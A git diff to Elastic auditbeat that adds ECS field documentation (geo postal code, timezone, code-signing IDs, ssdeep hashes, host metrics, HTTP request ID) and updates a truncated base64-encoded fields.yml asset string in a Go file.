a/auditbeat/docs/fields.asciidoc b/auditbeat/docs/fields.asciidoc index c5b814b54f9..c7b8129b4ae 100644 --- a/auditbeat/docs/fields.asciidoc +++ b/auditbeat/docs/fields.asciidoc @@ -2477,6 +2477,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -3087,6 +3096,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -3144,6 +3164,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -3166,6 +3198,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -3179,9 +3222,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -3496,6 +3542,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -3513,6 +3571,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -3536,6 +3606,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -3702,6 +3784,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -3759,6 +3852,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -3781,6 +3886,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -3794,9 +3910,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -4015,6 +4134,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -4038,6 +4169,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -4098,6 +4241,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -4843,6 +4995,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -4866,6 +5030,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -5014,6 +5190,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -5504,6 +5689,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -5561,6 +5757,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -5583,6 +5791,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -5620,8 +5839,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -5660,6 +5880,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -5678,6 +5907,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -5701,6 +5959,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -5758,6 +6027,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -5780,6 +6061,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -5813,10 +6105,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -5829,6 +6124,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -6106,6 +6437,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -6639,7 +6982,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6703,7 +7046,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6722,6 +7065,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -6779,6 +7133,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -6801,6 +7167,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -6813,7 +7190,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6877,7 +7254,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6897,10 +7274,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -7470,6 +7850,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -7493,6 +7885,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -7615,6 +8019,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -7669,6 +8082,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -7692,6 +8117,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -7814,6 +8251,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -8552,6 +8998,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -8609,6 +9066,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -8631,6 +9100,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -8644,9 +9124,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -9014,6 +9497,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -9071,6 +9565,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -9093,6 +9599,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -9106,9 +9623,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/auditbeat/include/fields.go b/auditbeat/include/fields.go index ebc0d6d76d1..85ca68afe0e 100644 --- a/auditbeat/include/fields.go +++ b/auditbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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